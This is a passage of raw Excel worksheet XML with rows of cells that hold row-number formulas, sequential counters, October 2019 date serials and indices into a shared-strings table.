    <row r="14307" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14307">
        <f t="shared" si="223"/>
        <v>14306</v>
      </c>
      <c r="B14307">
        <v>4306</v>
      </c>
      <c r="C14307" t="s">
        <v>19637</v>
      </c>
      <c r="D14307" s="1">
        <v>43739</v>
      </c>
      <c r="E14307" t="s">
        <v>20488</v>
      </c>
      <c r="F14307" t="s">
        <v>10526</v>
      </c>
      <c r="G14307" t="s">
        <v>24741</v>
      </c>
    </row>
    <row r="14308" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14308">
        <f t="shared" si="223"/>
        <v>14307</v>
      </c>
      <c r="B14308">
        <v>4307</v>
      </c>
      <c r="C14308" t="s">
        <v>19637</v>
      </c>
      <c r="D14308" s="1">
        <v>43757</v>
      </c>
      <c r="E14308" t="s">
        <v>19690</v>
      </c>
      <c r="F14308" t="s">
        <v>9978</v>
      </c>
      <c r="G14308" t="s">
        <v>24742</v>
      </c>
    </row>
    <row r="14309" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14309">
        <f t="shared" si="223"/>
        <v>14308</v>
      </c>
      <c r="B14309">
        <v>4308</v>
      </c>
      <c r="C14309" t="s">
        <v>19637</v>
      </c>
      <c r="D14309" s="1">
        <v>43746</v>
      </c>
      <c r="F14309" t="s">
        <v>10526</v>
      </c>
      <c r="G14309" t="s">
        <v>24743</v>
      </c>
    </row>
    <row r="14310" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14310">
        <f t="shared" si="223"/>
        <v>14309</v>
      </c>
      <c r="B14310">
        <v>4309</v>
      </c>
      <c r="C14310" t="s">
        <v>19637</v>
      </c>
      <c r="D14310" s="1">
        <v>43744</v>
      </c>
      <c r="E14310" t="s">
        <v>19687</v>
      </c>
      <c r="F14310" t="s">
        <v>10021</v>
      </c>
      <c r="G14310" t="s">
        <v>24744</v>
      </c>
    </row>
    <row r="14311" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14311">
        <f t="shared" si="223"/>
        <v>14310</v>
      </c>
      <c r="B14311">
        <v>4310</v>
      </c>
      <c r="C14311" t="s">
        <v>19637</v>
      </c>
      <c r="D14311" s="1">
        <v>43750</v>
      </c>
      <c r="E14311" t="s">
        <v>19690</v>
      </c>
      <c r="F14311" t="s">
        <v>9978</v>
      </c>
      <c r="G14311" t="s">
        <v>24745</v>
      </c>
    </row>
    <row r="14312" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14312">
        <f t="shared" si="223"/>
        <v>14311</v>
      </c>
      <c r="B14312">
        <v>4311</v>
      </c>
      <c r="C14312" t="s">
        <v>19637</v>
      </c>
      <c r="D14312" s="1">
        <v>43741</v>
      </c>
      <c r="E14312" t="s">
        <v>19717</v>
      </c>
      <c r="F14312" t="s">
        <v>10526</v>
      </c>
      <c r="G14312" t="s">
        <v>24746</v>
      </c>
    </row>
    <row r="14313" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14313">
        <f t="shared" si="223"/>
        <v>14312</v>
      </c>
      <c r="B14313">
        <v>4312</v>
      </c>
      <c r="C14313" t="s">
        <v>19637</v>
      </c>
      <c r="D14313" s="1">
        <v>43757</v>
      </c>
      <c r="F14313" t="s">
        <v>9978</v>
      </c>
      <c r="G14313" t="s">
        <v>24747</v>
      </c>
    </row>
    <row r="14314" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14314">
        <f t="shared" si="223"/>
        <v>14313</v>
      </c>
      <c r="B14314">
        <v>4313</v>
      </c>
      <c r="C14314" t="s">
        <v>19637</v>
      </c>
      <c r="D14314" s="1">
        <v>43756</v>
      </c>
      <c r="F14314" t="s">
        <v>10021</v>
      </c>
      <c r="G14314" t="s">
        <v>24748</v>
      </c>
    </row>
    <row r="14315" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14315">
        <f t="shared" si="223"/>
        <v>14314</v>
      </c>
      <c r="B14315">
        <v>4314</v>
      </c>
      <c r="C14315" t="s">
        <v>19637</v>
      </c>
      <c r="D14315" s="1">
        <v>43739</v>
      </c>
      <c r="E14315" t="s">
        <v>19640</v>
      </c>
      <c r="F14315" t="s">
        <v>10021</v>
      </c>
      <c r="G14315" t="s">
        <v>24749</v>
      </c>
    </row>
    <row r="14316" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14316">
        <f t="shared" si="223"/>
        <v>14315</v>
      </c>
      <c r="B14316">
        <v>4315</v>
      </c>
      <c r="C14316" t="s">
        <v>19637</v>
      </c>
      <c r="D14316" s="1">
        <v>43744</v>
      </c>
      <c r="E14316" t="s">
        <v>19640</v>
      </c>
      <c r="F14316" t="s">
        <v>10021</v>
      </c>
      <c r="G14316" t="s">
        <v>24750</v>
      </c>
    </row>
    <row r="14317" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14317">
        <f t="shared" si="223"/>
        <v>14316</v>
      </c>
      <c r="B14317">
        <v>4316</v>
      </c>
      <c r="C14317" t="s">
        <v>19637</v>
      </c>
      <c r="D14317" s="1">
        <v>43750</v>
      </c>
      <c r="E14317" t="s">
        <v>19917</v>
      </c>
      <c r="F14317" t="s">
        <v>9975</v>
      </c>
      <c r="G14317" t="s">
        <v>24751</v>
      </c>
    </row>
    <row r="14318" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14318">
        <f t="shared" si="223"/>
        <v>14317</v>
      </c>
      <c r="B14318">
        <v>4317</v>
      </c>
      <c r="C14318" t="s">
        <v>19637</v>
      </c>
      <c r="D14318" s="1">
        <v>43755</v>
      </c>
      <c r="E14318" t="s">
        <v>19879</v>
      </c>
      <c r="F14318" t="s">
        <v>10021</v>
      </c>
      <c r="G14318" t="s">
        <v>24752</v>
      </c>
    </row>
    <row r="14319" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14319">
        <f t="shared" si="223"/>
        <v>14318</v>
      </c>
      <c r="B14319">
        <v>4318</v>
      </c>
      <c r="C14319" t="s">
        <v>19637</v>
      </c>
      <c r="D14319" s="1">
        <v>43751</v>
      </c>
      <c r="E14319" t="s">
        <v>19725</v>
      </c>
      <c r="F14319" t="s">
        <v>9978</v>
      </c>
      <c r="G14319" t="s">
        <v>24753</v>
      </c>
    </row>
    <row r="14320" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14320">
        <f t="shared" si="223"/>
        <v>14319</v>
      </c>
      <c r="B14320">
        <v>4319</v>
      </c>
      <c r="C14320" t="s">
        <v>19637</v>
      </c>
      <c r="D14320" s="1">
        <v>43743</v>
      </c>
      <c r="E14320" t="s">
        <v>19640</v>
      </c>
      <c r="F14320" t="s">
        <v>9975</v>
      </c>
      <c r="G14320" t="s">
        <v>24754</v>
      </c>
    </row>
    <row r="14321" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14321">
        <f t="shared" si="223"/>
        <v>14320</v>
      </c>
      <c r="B14321">
        <v>4320</v>
      </c>
      <c r="C14321" t="s">
        <v>19637</v>
      </c>
      <c r="D14321" s="1">
        <v>43742</v>
      </c>
      <c r="F14321" t="s">
        <v>10526</v>
      </c>
      <c r="G14321" t="s">
        <v>24755</v>
      </c>
    </row>
    <row r="14322" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14322">
        <f t="shared" si="223"/>
        <v>14321</v>
      </c>
      <c r="B14322">
        <v>4321</v>
      </c>
      <c r="C14322" t="s">
        <v>19637</v>
      </c>
      <c r="D14322" s="1">
        <v>43747</v>
      </c>
      <c r="E14322" t="s">
        <v>19879</v>
      </c>
      <c r="F14322" t="s">
        <v>10021</v>
      </c>
      <c r="G14322" t="s">
        <v>24756</v>
      </c>
    </row>
    <row r="14323" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14323">
        <f t="shared" si="223"/>
        <v>14322</v>
      </c>
      <c r="B14323">
        <v>4322</v>
      </c>
      <c r="C14323" t="s">
        <v>19637</v>
      </c>
      <c r="D14323" s="1">
        <v>43752</v>
      </c>
      <c r="E14323" t="s">
        <v>20185</v>
      </c>
      <c r="F14323" t="s">
        <v>9975</v>
      </c>
      <c r="G14323" t="s">
        <v>24757</v>
      </c>
    </row>
    <row r="14324" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14324">
        <f t="shared" si="223"/>
        <v>14323</v>
      </c>
      <c r="B14324">
        <v>4323</v>
      </c>
      <c r="C14324" t="s">
        <v>19637</v>
      </c>
      <c r="D14324" s="1">
        <v>43742</v>
      </c>
      <c r="F14324" t="s">
        <v>10526</v>
      </c>
      <c r="G14324" t="s">
        <v>24758</v>
      </c>
    </row>
    <row r="14325" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14325">
        <f t="shared" si="223"/>
        <v>14324</v>
      </c>
      <c r="B14325">
        <v>4324</v>
      </c>
      <c r="C14325" t="s">
        <v>19637</v>
      </c>
      <c r="D14325" s="1">
        <v>43744</v>
      </c>
      <c r="E14325" t="s">
        <v>19648</v>
      </c>
      <c r="F14325" t="s">
        <v>10021</v>
      </c>
      <c r="G14325" t="s">
        <v>24759</v>
      </c>
    </row>
    <row r="14326" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14326">
        <f t="shared" si="223"/>
        <v>14325</v>
      </c>
      <c r="B14326">
        <v>4325</v>
      </c>
      <c r="C14326" t="s">
        <v>19637</v>
      </c>
      <c r="D14326" s="1">
        <v>43744</v>
      </c>
      <c r="E14326" t="s">
        <v>19680</v>
      </c>
      <c r="F14326" t="s">
        <v>10021</v>
      </c>
      <c r="G14326" t="s">
        <v>24760</v>
      </c>
    </row>
    <row r="14327" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14327">
        <f t="shared" si="223"/>
        <v>14326</v>
      </c>
      <c r="B14327">
        <v>4326</v>
      </c>
      <c r="C14327" t="s">
        <v>19637</v>
      </c>
      <c r="D14327" s="1">
        <v>43749</v>
      </c>
      <c r="E14327" t="s">
        <v>20525</v>
      </c>
      <c r="F14327" t="s">
        <v>10021</v>
      </c>
      <c r="G14327" t="s">
        <v>24761</v>
      </c>
    </row>
    <row r="14328" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14328">
        <f t="shared" si="223"/>
        <v>14327</v>
      </c>
      <c r="B14328">
        <v>4327</v>
      </c>
      <c r="C14328" t="s">
        <v>19637</v>
      </c>
      <c r="D14328" s="1">
        <v>43749</v>
      </c>
      <c r="E14328" t="s">
        <v>19640</v>
      </c>
      <c r="F14328" t="s">
        <v>9975</v>
      </c>
      <c r="G14328" t="s">
        <v>24762</v>
      </c>
    </row>
    <row r="14329" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14329">
        <f t="shared" si="223"/>
        <v>14328</v>
      </c>
      <c r="B14329">
        <v>4328</v>
      </c>
      <c r="C14329" t="s">
        <v>19637</v>
      </c>
      <c r="D14329" s="1">
        <v>43756</v>
      </c>
      <c r="F14329" t="s">
        <v>10526</v>
      </c>
      <c r="G14329" t="s">
        <v>22918</v>
      </c>
    </row>
    <row r="14330" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14330">
        <f t="shared" si="223"/>
        <v>14329</v>
      </c>
      <c r="B14330">
        <v>4329</v>
      </c>
      <c r="C14330" t="s">
        <v>19637</v>
      </c>
      <c r="D14330" s="1">
        <v>43755</v>
      </c>
      <c r="E14330" t="s">
        <v>21039</v>
      </c>
      <c r="F14330" t="s">
        <v>10021</v>
      </c>
      <c r="G14330" t="s">
        <v>24763</v>
      </c>
    </row>
    <row r="14331" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14331">
        <f t="shared" si="223"/>
        <v>14330</v>
      </c>
      <c r="B14331">
        <v>4330</v>
      </c>
      <c r="C14331" t="s">
        <v>19637</v>
      </c>
      <c r="D14331" s="1">
        <v>43749</v>
      </c>
      <c r="E14331" t="s">
        <v>19680</v>
      </c>
      <c r="F14331" t="s">
        <v>10021</v>
      </c>
      <c r="G14331" t="s">
        <v>24764</v>
      </c>
    </row>
    <row r="14332" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14332">
        <f t="shared" si="223"/>
        <v>14331</v>
      </c>
      <c r="B14332">
        <v>4331</v>
      </c>
      <c r="C14332" t="s">
        <v>19637</v>
      </c>
      <c r="D14332" s="1">
        <v>43739</v>
      </c>
      <c r="E14332" t="s">
        <v>23619</v>
      </c>
      <c r="F14332" t="s">
        <v>10526</v>
      </c>
      <c r="G14332" t="s">
        <v>24765</v>
      </c>
    </row>
    <row r="14333" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14333">
        <f t="shared" si="223"/>
        <v>14332</v>
      </c>
      <c r="B14333">
        <v>4332</v>
      </c>
      <c r="C14333" t="s">
        <v>19637</v>
      </c>
      <c r="D14333" s="1">
        <v>43756</v>
      </c>
      <c r="E14333" t="s">
        <v>24507</v>
      </c>
      <c r="F14333" t="s">
        <v>10526</v>
      </c>
      <c r="G14333" t="s">
        <v>24766</v>
      </c>
    </row>
    <row r="14334" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14334">
        <f t="shared" si="223"/>
        <v>14333</v>
      </c>
      <c r="B14334">
        <v>4333</v>
      </c>
      <c r="C14334" t="s">
        <v>19637</v>
      </c>
      <c r="D14334" s="1">
        <v>43743</v>
      </c>
      <c r="F14334" t="s">
        <v>10526</v>
      </c>
      <c r="G14334" t="s">
        <v>24767</v>
      </c>
    </row>
    <row r="14335" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14335">
        <f t="shared" si="223"/>
        <v>14334</v>
      </c>
      <c r="B14335">
        <v>4334</v>
      </c>
      <c r="C14335" t="s">
        <v>19637</v>
      </c>
      <c r="D14335" s="1">
        <v>43755</v>
      </c>
      <c r="E14335" t="s">
        <v>19648</v>
      </c>
      <c r="F14335" t="s">
        <v>10021</v>
      </c>
      <c r="G14335" t="s">
        <v>24768</v>
      </c>
    </row>
    <row r="14336" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14336">
        <f t="shared" si="223"/>
        <v>14335</v>
      </c>
      <c r="B14336">
        <v>4335</v>
      </c>
      <c r="C14336" t="s">
        <v>19637</v>
      </c>
      <c r="D14336" s="1">
        <v>43739</v>
      </c>
      <c r="E14336" t="s">
        <v>22546</v>
      </c>
      <c r="F14336" t="s">
        <v>9975</v>
      </c>
      <c r="G14336" t="s">
        <v>24769</v>
      </c>
    </row>
    <row r="14337" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14337">
        <f t="shared" si="223"/>
        <v>14336</v>
      </c>
      <c r="B14337">
        <v>4336</v>
      </c>
      <c r="C14337" t="s">
        <v>19637</v>
      </c>
      <c r="D14337" s="1">
        <v>43741</v>
      </c>
      <c r="F14337" t="s">
        <v>9978</v>
      </c>
      <c r="G14337" t="s">
        <v>24770</v>
      </c>
    </row>
    <row r="14338" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14338">
        <f t="shared" si="223"/>
        <v>14337</v>
      </c>
      <c r="B14338">
        <v>4337</v>
      </c>
      <c r="C14338" t="s">
        <v>19637</v>
      </c>
      <c r="D14338" s="1">
        <v>43740</v>
      </c>
      <c r="E14338" t="s">
        <v>19643</v>
      </c>
      <c r="F14338" t="s">
        <v>10021</v>
      </c>
      <c r="G14338" t="s">
        <v>24771</v>
      </c>
    </row>
    <row r="14339" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14339">
        <f t="shared" ref="A14339:A14402" si="224">+ROW(A14338)</f>
        <v>14338</v>
      </c>
      <c r="B14339">
        <v>4338</v>
      </c>
      <c r="C14339" t="s">
        <v>19637</v>
      </c>
      <c r="D14339" s="1">
        <v>43756</v>
      </c>
      <c r="F14339" t="s">
        <v>10526</v>
      </c>
      <c r="G14339" t="s">
        <v>24772</v>
      </c>
    </row>
    <row r="14340" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14340">
        <f t="shared" si="224"/>
        <v>14339</v>
      </c>
      <c r="B14340">
        <v>4339</v>
      </c>
      <c r="C14340" t="s">
        <v>19637</v>
      </c>
      <c r="D14340" s="1">
        <v>43750</v>
      </c>
      <c r="F14340" t="s">
        <v>10526</v>
      </c>
      <c r="G14340" t="s">
        <v>24773</v>
      </c>
    </row>
    <row r="14341" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14341">
        <f t="shared" si="224"/>
        <v>14340</v>
      </c>
      <c r="B14341">
        <v>4340</v>
      </c>
      <c r="C14341" t="s">
        <v>19637</v>
      </c>
      <c r="D14341" s="1">
        <v>43742</v>
      </c>
      <c r="E14341" t="s">
        <v>24774</v>
      </c>
      <c r="F14341" t="s">
        <v>10526</v>
      </c>
      <c r="G14341" t="s">
        <v>24775</v>
      </c>
    </row>
    <row r="14342" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14342">
        <f t="shared" si="224"/>
        <v>14341</v>
      </c>
      <c r="B14342">
        <v>4341</v>
      </c>
      <c r="C14342" t="s">
        <v>19637</v>
      </c>
      <c r="D14342" s="1">
        <v>43747</v>
      </c>
      <c r="E14342" t="s">
        <v>19638</v>
      </c>
      <c r="F14342" t="s">
        <v>10021</v>
      </c>
      <c r="G14342" t="s">
        <v>24776</v>
      </c>
    </row>
    <row r="14343" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14343">
        <f t="shared" si="224"/>
        <v>14342</v>
      </c>
      <c r="B14343">
        <v>4342</v>
      </c>
      <c r="C14343" t="s">
        <v>19637</v>
      </c>
      <c r="D14343" s="1">
        <v>43751</v>
      </c>
      <c r="F14343" t="s">
        <v>10526</v>
      </c>
      <c r="G14343" t="s">
        <v>24777</v>
      </c>
    </row>
    <row r="14344" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14344">
        <f t="shared" si="224"/>
        <v>14343</v>
      </c>
      <c r="B14344">
        <v>4343</v>
      </c>
      <c r="C14344" t="s">
        <v>19637</v>
      </c>
      <c r="D14344" s="1">
        <v>43740</v>
      </c>
      <c r="E14344" t="s">
        <v>20704</v>
      </c>
      <c r="F14344" t="s">
        <v>10526</v>
      </c>
      <c r="G14344" t="s">
        <v>24778</v>
      </c>
    </row>
    <row r="14345" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14345">
        <f t="shared" si="224"/>
        <v>14344</v>
      </c>
      <c r="B14345">
        <v>4344</v>
      </c>
      <c r="C14345" t="s">
        <v>19637</v>
      </c>
      <c r="D14345" s="1">
        <v>43747</v>
      </c>
      <c r="E14345" t="s">
        <v>24779</v>
      </c>
      <c r="F14345" t="s">
        <v>10526</v>
      </c>
      <c r="G14345" t="s">
        <v>24780</v>
      </c>
    </row>
    <row r="14346" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14346">
        <f t="shared" si="224"/>
        <v>14345</v>
      </c>
      <c r="B14346">
        <v>4345</v>
      </c>
      <c r="C14346" t="s">
        <v>19637</v>
      </c>
      <c r="D14346" s="1">
        <v>43755</v>
      </c>
      <c r="E14346" t="s">
        <v>19896</v>
      </c>
      <c r="F14346" t="s">
        <v>10021</v>
      </c>
      <c r="G14346" t="s">
        <v>24781</v>
      </c>
    </row>
    <row r="14347" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14347">
        <f t="shared" si="224"/>
        <v>14346</v>
      </c>
      <c r="B14347">
        <v>4346</v>
      </c>
      <c r="C14347" t="s">
        <v>19637</v>
      </c>
      <c r="D14347" s="1">
        <v>43750</v>
      </c>
      <c r="E14347" t="s">
        <v>19687</v>
      </c>
      <c r="F14347" t="s">
        <v>10021</v>
      </c>
      <c r="G14347" t="s">
        <v>24782</v>
      </c>
    </row>
    <row r="14348" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14348">
        <f t="shared" si="224"/>
        <v>14347</v>
      </c>
      <c r="B14348">
        <v>4347</v>
      </c>
      <c r="C14348" t="s">
        <v>19637</v>
      </c>
      <c r="D14348" s="1">
        <v>43740</v>
      </c>
      <c r="E14348" t="s">
        <v>24783</v>
      </c>
      <c r="F14348" t="s">
        <v>10526</v>
      </c>
      <c r="G14348" t="s">
        <v>24784</v>
      </c>
    </row>
    <row r="14349" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14349">
        <f t="shared" si="224"/>
        <v>14348</v>
      </c>
      <c r="B14349">
        <v>4348</v>
      </c>
      <c r="C14349" t="s">
        <v>19637</v>
      </c>
      <c r="D14349" s="1">
        <v>43754</v>
      </c>
      <c r="E14349" t="s">
        <v>19640</v>
      </c>
      <c r="F14349" t="s">
        <v>9975</v>
      </c>
      <c r="G14349" t="s">
        <v>24785</v>
      </c>
    </row>
    <row r="14350" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14350">
        <f t="shared" si="224"/>
        <v>14349</v>
      </c>
      <c r="B14350">
        <v>4349</v>
      </c>
      <c r="C14350" t="s">
        <v>19637</v>
      </c>
      <c r="D14350" s="1">
        <v>43750</v>
      </c>
      <c r="E14350" t="s">
        <v>19640</v>
      </c>
      <c r="F14350" t="s">
        <v>10021</v>
      </c>
      <c r="G14350" t="s">
        <v>24786</v>
      </c>
    </row>
    <row r="14351" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14351">
        <f t="shared" si="224"/>
        <v>14350</v>
      </c>
      <c r="B14351">
        <v>4350</v>
      </c>
      <c r="C14351" t="s">
        <v>19637</v>
      </c>
      <c r="D14351" s="1">
        <v>43744</v>
      </c>
      <c r="E14351" t="s">
        <v>19650</v>
      </c>
      <c r="F14351" t="s">
        <v>10021</v>
      </c>
      <c r="G14351" t="s">
        <v>24787</v>
      </c>
    </row>
    <row r="14352" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14352">
        <f t="shared" si="224"/>
        <v>14351</v>
      </c>
      <c r="B14352">
        <v>4351</v>
      </c>
      <c r="C14352" t="s">
        <v>19637</v>
      </c>
      <c r="D14352" s="1">
        <v>43747</v>
      </c>
      <c r="E14352" t="s">
        <v>19687</v>
      </c>
      <c r="F14352" t="s">
        <v>10021</v>
      </c>
      <c r="G14352" t="s">
        <v>24788</v>
      </c>
    </row>
    <row r="14353" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14353">
        <f t="shared" si="224"/>
        <v>14352</v>
      </c>
      <c r="B14353">
        <v>4352</v>
      </c>
      <c r="C14353" t="s">
        <v>19637</v>
      </c>
      <c r="D14353" s="1">
        <v>43739</v>
      </c>
      <c r="F14353" t="s">
        <v>10526</v>
      </c>
      <c r="G14353" t="s">
        <v>24789</v>
      </c>
    </row>
    <row r="14354" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14354">
        <f t="shared" si="224"/>
        <v>14353</v>
      </c>
      <c r="B14354">
        <v>4353</v>
      </c>
      <c r="C14354" t="s">
        <v>19637</v>
      </c>
      <c r="D14354" s="1">
        <v>43753</v>
      </c>
      <c r="E14354" t="s">
        <v>19640</v>
      </c>
      <c r="F14354" t="s">
        <v>10021</v>
      </c>
      <c r="G14354" t="s">
        <v>24790</v>
      </c>
    </row>
    <row r="14355" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14355">
        <f t="shared" si="224"/>
        <v>14354</v>
      </c>
      <c r="B14355">
        <v>4354</v>
      </c>
      <c r="C14355" t="s">
        <v>19637</v>
      </c>
      <c r="D14355" s="1">
        <v>43747</v>
      </c>
      <c r="F14355" t="s">
        <v>10526</v>
      </c>
      <c r="G14355" t="s">
        <v>24791</v>
      </c>
    </row>
    <row r="14356" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14356">
        <f t="shared" si="224"/>
        <v>14355</v>
      </c>
      <c r="B14356">
        <v>4355</v>
      </c>
      <c r="C14356" t="s">
        <v>19637</v>
      </c>
      <c r="D14356" s="1">
        <v>43752</v>
      </c>
      <c r="E14356" t="s">
        <v>24792</v>
      </c>
      <c r="F14356" t="s">
        <v>9978</v>
      </c>
      <c r="G14356" t="s">
        <v>24793</v>
      </c>
    </row>
    <row r="14357" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14357">
        <f t="shared" si="224"/>
        <v>14356</v>
      </c>
      <c r="B14357">
        <v>4356</v>
      </c>
      <c r="C14357" t="s">
        <v>19637</v>
      </c>
      <c r="D14357" s="1">
        <v>43739</v>
      </c>
      <c r="F14357" t="s">
        <v>10526</v>
      </c>
      <c r="G14357" t="s">
        <v>24794</v>
      </c>
    </row>
    <row r="14358" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14358">
        <f t="shared" si="224"/>
        <v>14357</v>
      </c>
      <c r="B14358">
        <v>4357</v>
      </c>
      <c r="C14358" t="s">
        <v>19637</v>
      </c>
      <c r="D14358" s="1">
        <v>43745</v>
      </c>
      <c r="E14358" t="s">
        <v>19917</v>
      </c>
      <c r="F14358" t="s">
        <v>9975</v>
      </c>
      <c r="G14358" t="s">
        <v>24795</v>
      </c>
    </row>
    <row r="14359" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14359">
        <f t="shared" si="224"/>
        <v>14358</v>
      </c>
      <c r="B14359">
        <v>4358</v>
      </c>
      <c r="C14359" t="s">
        <v>19637</v>
      </c>
      <c r="D14359" s="1">
        <v>43740</v>
      </c>
      <c r="F14359" t="s">
        <v>10526</v>
      </c>
      <c r="G14359" t="s">
        <v>24796</v>
      </c>
    </row>
    <row r="14360" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14360">
        <f t="shared" si="224"/>
        <v>14359</v>
      </c>
      <c r="B14360">
        <v>4359</v>
      </c>
      <c r="C14360" t="s">
        <v>19637</v>
      </c>
      <c r="D14360" s="1">
        <v>43753</v>
      </c>
      <c r="E14360" t="s">
        <v>19640</v>
      </c>
      <c r="F14360" t="s">
        <v>9975</v>
      </c>
      <c r="G14360" t="s">
        <v>24797</v>
      </c>
    </row>
    <row r="14361" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14361">
        <f t="shared" si="224"/>
        <v>14360</v>
      </c>
      <c r="B14361">
        <v>4360</v>
      </c>
      <c r="C14361" t="s">
        <v>19637</v>
      </c>
      <c r="D14361" s="1">
        <v>43753</v>
      </c>
      <c r="E14361" t="s">
        <v>21051</v>
      </c>
      <c r="F14361" t="s">
        <v>9978</v>
      </c>
      <c r="G14361" t="s">
        <v>24798</v>
      </c>
    </row>
    <row r="14362" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14362">
        <f t="shared" si="224"/>
        <v>14361</v>
      </c>
      <c r="B14362">
        <v>4361</v>
      </c>
      <c r="C14362" t="s">
        <v>19637</v>
      </c>
      <c r="D14362" s="1">
        <v>43750</v>
      </c>
      <c r="E14362" t="s">
        <v>24799</v>
      </c>
      <c r="F14362" t="s">
        <v>10526</v>
      </c>
      <c r="G14362" t="s">
        <v>24800</v>
      </c>
    </row>
    <row r="14363" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14363">
        <f t="shared" si="224"/>
        <v>14362</v>
      </c>
      <c r="B14363">
        <v>4362</v>
      </c>
      <c r="C14363" t="s">
        <v>19637</v>
      </c>
      <c r="D14363" s="1">
        <v>43743</v>
      </c>
      <c r="E14363" t="s">
        <v>19640</v>
      </c>
      <c r="F14363" t="s">
        <v>10021</v>
      </c>
      <c r="G14363" t="s">
        <v>24801</v>
      </c>
    </row>
    <row r="14364" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14364">
        <f t="shared" si="224"/>
        <v>14363</v>
      </c>
      <c r="B14364">
        <v>4363</v>
      </c>
      <c r="C14364" t="s">
        <v>19637</v>
      </c>
      <c r="D14364" s="1">
        <v>43749</v>
      </c>
      <c r="E14364" t="s">
        <v>19650</v>
      </c>
      <c r="F14364" t="s">
        <v>10021</v>
      </c>
      <c r="G14364" t="s">
        <v>24802</v>
      </c>
    </row>
    <row r="14365" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14365">
        <f t="shared" si="224"/>
        <v>14364</v>
      </c>
      <c r="B14365">
        <v>4364</v>
      </c>
      <c r="C14365" t="s">
        <v>19637</v>
      </c>
      <c r="D14365" s="1">
        <v>43744</v>
      </c>
      <c r="E14365" t="s">
        <v>19640</v>
      </c>
      <c r="F14365" t="s">
        <v>9975</v>
      </c>
      <c r="G14365" t="s">
        <v>24803</v>
      </c>
    </row>
    <row r="14366" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14366">
        <f t="shared" si="224"/>
        <v>14365</v>
      </c>
      <c r="B14366">
        <v>4365</v>
      </c>
      <c r="C14366" t="s">
        <v>19637</v>
      </c>
      <c r="D14366" s="1">
        <v>43744</v>
      </c>
      <c r="E14366" t="s">
        <v>24682</v>
      </c>
      <c r="F14366" t="s">
        <v>10526</v>
      </c>
      <c r="G14366" t="s">
        <v>24804</v>
      </c>
    </row>
    <row r="14367" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14367">
        <f t="shared" si="224"/>
        <v>14366</v>
      </c>
      <c r="B14367">
        <v>4366</v>
      </c>
      <c r="C14367" t="s">
        <v>19637</v>
      </c>
      <c r="D14367" s="1">
        <v>43743</v>
      </c>
      <c r="E14367" t="s">
        <v>19640</v>
      </c>
      <c r="F14367" t="s">
        <v>9975</v>
      </c>
      <c r="G14367" t="s">
        <v>24805</v>
      </c>
    </row>
    <row r="14368" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14368">
        <f t="shared" si="224"/>
        <v>14367</v>
      </c>
      <c r="B14368">
        <v>4367</v>
      </c>
      <c r="C14368" t="s">
        <v>19637</v>
      </c>
      <c r="D14368" s="1">
        <v>43744</v>
      </c>
      <c r="F14368" t="s">
        <v>10526</v>
      </c>
      <c r="G14368" t="s">
        <v>24806</v>
      </c>
    </row>
    <row r="14369" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14369">
        <f t="shared" si="224"/>
        <v>14368</v>
      </c>
      <c r="B14369">
        <v>4368</v>
      </c>
      <c r="C14369" t="s">
        <v>19637</v>
      </c>
      <c r="D14369" s="1">
        <v>43749</v>
      </c>
      <c r="F14369" t="s">
        <v>10526</v>
      </c>
